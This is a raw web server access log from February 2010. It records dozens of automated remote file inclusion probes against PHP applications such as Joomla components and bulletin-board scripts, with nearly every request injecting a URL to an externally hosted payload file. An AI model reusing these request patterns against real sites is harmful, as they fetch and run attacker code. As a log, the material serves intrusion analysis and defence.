187.51.144.67 - - [05/Feb/2010:16:02:41 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://freewebtown.com/blaahz/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "getyourselfahorse.com"
187.51.144.67 - - [05/Feb/2010:16:02:41 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://freewebtown.com/blaahz/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "getyourselfahorse.com"
187.51.144.67 - - [05/Feb/2010:16:02:42 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://freewebtown.com/blaahz/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "getyourselfahorse.com"
64.15.158.246 - - [05/Feb/2010:16:03:32 -0800] "GET /index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
64.15.158.246 - - [05/Feb/2010:16:03:32 -0800] "GET /logs/access_100116.log/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
64.15.158.246 - - [05/Feb/2010:16:03:32 -0800] "GET /logs/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.244.25.227 - - [05/Feb/2010:16:10:54 -0800] "GET /logs/access_100123.log/spaw_control.class.php?spaw_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
87.244.25.227 - - [05/Feb/2010:16:10:55 -0800] "GET /spaw_control.class.php?spaw_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
87.244.25.227 - - [05/Feb/2010:16:10:55 -0800] "GET /logs/spaw_control.class.php?spaw_root=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
125.141.91.138 - - [05/Feb/2010:16:14:57 -0800] "GET /logs/access_100123.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://90plan.ovh.net/~elicityl//components/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [05/Feb/2010:16:14:57 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://90plan.ovh.net/~elicityl//components/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [05/Feb/2010:16:14:57 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://90plan.ovh.net/~elicityl//components/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
114.52.233.164 - - [05/Feb/2010:16:15:02 -0800] "GET /logs/access_100123.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mya.red-ab.com/ok/cache/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.getyourselfahorse.com"
114.52.233.164 - - [05/Feb/2010:16:15:03 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mya.red-ab.com/ok/cache/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.getyourselfahorse.com"
114.52.233.164 - - [05/Feb/2010:16:15:03 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mya.red-ab.com/ok/cache/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.getyourselfahorse.com"
222.237.78.176 - - [05/Feb/2010:16:16:17 -0800] "GET /logs/access_091121.log//multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [05/Feb/2010:16:16:17 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [05/Feb/2010:16:16:17 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.195.113.236 - - [05/Feb/2010:16:16:32 -0800] "GET /discuss/ HTTP/1.0" 200 512 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
67.195.113.251 - - [05/Feb/2010:16:18:47 -0800] "GET /discuss/?N=A HTTP/1.0" 200 512 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:16:20:47 -0800] "GET /logs//include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:16:20:49 -0800] "GET /logs/access_100116.log//include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.136.126 - - [05/Feb/2010:16:20:59 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.136.126 - - [05/Feb/2010:16:20:59 -0800] "GET /logs/access_091121.log//multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.136.126 - - [05/Feb/2010:16:20:59 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [05/Feb/2010:16:21:25 -0800] "GET /logs/access_100123.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://90plan.ovh.net/~elicityl//components/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:16:21:47 -0800] "GET /logs/access_100123.log//include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
187.51.144.67 - - [05/Feb/2010:16:22:13 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://freewebtown.com/blaahz/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
114.52.233.164 - - [05/Feb/2010:16:22:27 -0800] "GET /logs/access_100130.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mya.red-ab.com/ok/cache/id.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.getyourselfahorse.com"
125.141.91.138 - - [05/Feb/2010:16:25:23 -0800] "GET /logs/access_100130.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://90plan.ovh.net/~elicityl//components/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:26:47 -0800] "GET /logs/access.log//include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:26:47 -0800] "GET /include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:26:47 -0800] "GET /logs//include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:26:59 -0800] "GET /logs/access.log//include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:26:59 -0800] "GET /include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:26:59 -0800] "GET /logs//include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:28:32 -0800] "GET /logs/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:28:32 -0800] "GET /logs/access_100116.log/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:28:32 -0800] "GET /index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:29:05 -0800] "GET /logs//include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:29:05 -0800] "GET /include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:29:05 -0800] "GET /logs/access_100130.log%20%20//include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:29:17 -0800] "GET /index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:29:17 -0800] "GET /logs/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:29:23 -0800] "GET /logs/access_100116.log/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:32:57 -0800] "GET /include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:32:57 -0800] "GET /logs/access_100130.log//include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:32:57 -0800] "GET /logs//include/mail.inc.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:38:11 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:38:11 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:38:11 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:38:28 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:38:28 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:16:38:28 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:40:01 -0800] "GET /index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:40:01 -0800] "GET /logs/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:40:06 -0800] "GET /logs/access_100116.log/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:47:51 -0800] "GET /index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:47:51 -0800] "GET /logs/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:47:54 -0800] "GET /logs/access_100116.log/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:48:43 -0800] "GET /index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:48:47 -0800] "GET /logs/access_100116.log/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:48:47 -0800] "GET /logs/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
210.205.6.233 - - [05/Feb/2010:16:49:06 -0800] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.205.6.233 - - [05/Feb/2010:16:49:06 -0800] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.205.6.233 - - [05/Feb/2010:16:49:10 -0800] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.205.6.233 - - [05/Feb/2010:16:49:10 -0800] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.205.6.233 - - [05/Feb/2010:16:49:14 -0800] "GET /logs/access_091121.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.205.6.233 - - [05/Feb/2010:16:49:18 -0800] "GET /logs/access_091121.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.119.203.89 - - [05/Feb/2010:16:51:03 -0800] "GET /logs/access_100116.log%20%20//sitemap.php?type=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.119.203.89 - - [05/Feb/2010:16:51:03 -0800] "GET /logs//sitemap.php?type=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.119.203.89 - - [05/Feb/2010:16:51:03 -0800] "GET /sitemap.php?type=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.119.203.89 - - [05/Feb/2010:16:51:06 -0800] "GET /sitemap.php?type=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.119.203.89 - - [05/Feb/2010:16:51:06 -0800] "GET /logs//sitemap.php?type=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.119.203.89 - - [05/Feb/2010:16:51:06 -0800] "GET /logs/access_100116.log%20%20//sitemap.php?type=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.119.203.89 - - [05/Feb/2010:16:51:30 -0800] "GET /sitemap.php?type=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.119.203.89 - - [05/Feb/2010:16:51:30 -0800] "GET /logs/access_100116.log//sitemap.php?type=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.119.203.89 - - [05/Feb/2010:16:51:30 -0800] "GET /logs//sitemap.php?type=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:51:32 -0800] "GET /logs/access_100116.log/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:51:32 -0800] "GET /logs/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:51:36 -0800] "GET /index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.119.203.89 - - [05/Feb/2010:16:51:37 -0800] "GET /logs/access_100116.log//sitemap.php?type=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.119.203.89 - - [05/Feb/2010:16:51:37 -0800] "GET /logs//sitemap.php?type=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.119.203.89 - - [05/Feb/2010:16:51:37 -0800] "GET /sitemap.php?type=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:55:36 -0800] "GET /index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:55:40 -0800] "GET /logs/access_100116.log/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:55:40 -0800] "GET /logs/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:57:28 -0800] "GET /logs/access_100116.log/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:57:28 -0800] "GET /index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:57:31 -0800] "GET /logs/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:58:23 -0800] "GET /logs/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:58:23 -0800] "GET /logs/access_100116.log/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:58:23 -0800] "GET /index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:16:58:59 -0800] "GET /include/write.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:16:58:59 -0800] "GET /logs/access_100116.log//include/write.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:16:58:59 -0800] "GET /logs//include/write.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:59:19 -0800] "GET /logs/access_100116.log/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:59:19 -0800] "GET /logs/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:59:19 -0800] "GET /index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:16:59:24 -0800] "GET /logs/access_091121.log//include/write.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:59:38 -0800] "GET /logs/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:59:38 -0800] "GET /index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.95.78.56 - - [05/Feb/2010:16:59:41 -0800] "GET /logs/access_100116.log/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
65.55.207.76 - - [05/Feb/2010:17:05:46 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
65.55.207.76 - - [05/Feb/2010:17:06:41 -0800] "GET /?N=D HTTP/1.1" 200 915 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
200.93.147.154 - - [05/Feb/2010:17:07:45 -0800] "GET /logs/access_100116.log//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [05/Feb/2010:17:07:45 -0800] "GET /logs//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [05/Feb/2010:17:07:50 -0800] "GET /bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [05/Feb/2010:17:11:41 -0800] "GET /logs//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [05/Feb/2010:17:11:48 -0800] "GET /bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [05/Feb/2010:17:11:48 -0800] "GET /logs/access_100116.log//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [05/Feb/2010:17:11:52 -0800] "GET /bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [05/Feb/2010:17:11:52 -0800] "GET /logs//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [05/Feb/2010:17:11:57 -0800] "GET /logs/access_100116.log//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [05/Feb/2010:17:11:59 -0800] "GET /bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [05/Feb/2010:17:11:59 -0800] "GET /logs/access_100116.log//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [05/Feb/2010:17:11:59 -0800] "GET /logs//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:17:12:40 -0800] "GET /logs/access_100130.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:17:12:40 -0800] "GET /logs/access_100123.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:17:12:40 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [05/Feb/2010:17:12:40 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.232.237.122 - - [05/Feb/2010:17:13:29 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.232.237.122 - - [05/Feb/2010:17:13:29 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.232.237.122 - - [05/Feb/2010:17:13:29 -0800] "GET /logs/access_100123.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.232.237.122 - - [05/Feb/2010:17:13:33 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
